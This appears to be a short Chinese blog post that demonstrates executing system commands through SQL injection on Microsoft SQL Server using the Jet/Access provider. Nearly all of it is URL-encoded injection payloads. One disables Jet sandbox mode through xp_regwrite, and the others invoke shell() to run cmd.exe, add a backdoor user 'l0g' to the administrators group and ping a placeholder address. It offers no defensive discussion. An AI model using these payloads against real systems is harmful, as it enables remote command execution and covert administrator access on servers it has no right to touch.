利用access執行命令的一個實例


;exec%20master..xp_regwrite%20'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0;--


%20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/dnary.mdb','select%20shell("cmd.exe%20/c%20net%20user%20l0g%20l0g%20/add")'))


%20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/dnary.mdb','select%20shell("cmd.exe%20/c%20net%20localgroup%20administrators%20l0g%20/add")'))

net%20localgroup%20administrators%20l0g%20/add


 %20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/dnary.mdb','select%20shell("cmd.exe%20/c%20ping xxx.xxx.xxx.xxx")'))

發佈了24 篇原創文章 · 獲贊 0 · 訪問量 3萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章